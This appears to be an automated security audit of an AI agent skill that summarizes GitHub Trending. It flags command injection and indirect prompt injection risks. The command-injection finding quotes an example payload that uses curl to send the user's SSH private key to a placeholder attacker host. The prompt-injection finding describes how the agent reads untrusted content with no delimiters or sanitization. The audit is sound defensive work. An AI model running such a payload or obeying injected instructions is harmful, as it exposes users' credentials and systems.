Skills
skills/aaronjmars/aeon/GitHub Trending/Gen Agent Trust Hub

GitHub Trending

Fail

Audited by Gen Agent Trust Hub on May 9, 2026

Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill instructs the agent to execute shell commands constructed with data from an external, untrusted source. In Step 2, the agent is told to run gh api "repos/OWNER/REPO" --jq '{created_at, stargazers_count, pushed_at}' for repositories identified in Step 1. Because the OWNER/REPO values are extracted from the public GitHub Trending page, an attacker could name a repository using shell injection sequences (e.g., $(touch pwned) or ; curl attacker.com/leak?d=$(cat ~/.ssh/id_rsa)) to execute arbitrary commands when the agent processes the trending list.
  • [PROMPT_INJECTION]: The skill ingests and summarizes content from an external source (GitHub) without sanitization or boundary markers, making it vulnerable to indirect prompt injection.
  • Ingestion points: WebFetch from https://github.com/trending and gh api responses (SKILL.md).
  • Boundary markers: Absent. The instructions do not provide delimiters or warnings to ignore instructions within the fetched repository metadata.
  • Capability inventory: WebFetch (read), gh api (execution with auth), ./notify (write), and file system access to memory/logs/ and soul/ directories.
  • Sanitization: Absent. There is no requirement for the agent to validate or escape strings before using them in commands or final outputs.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
May 9, 2026, 03:14 PM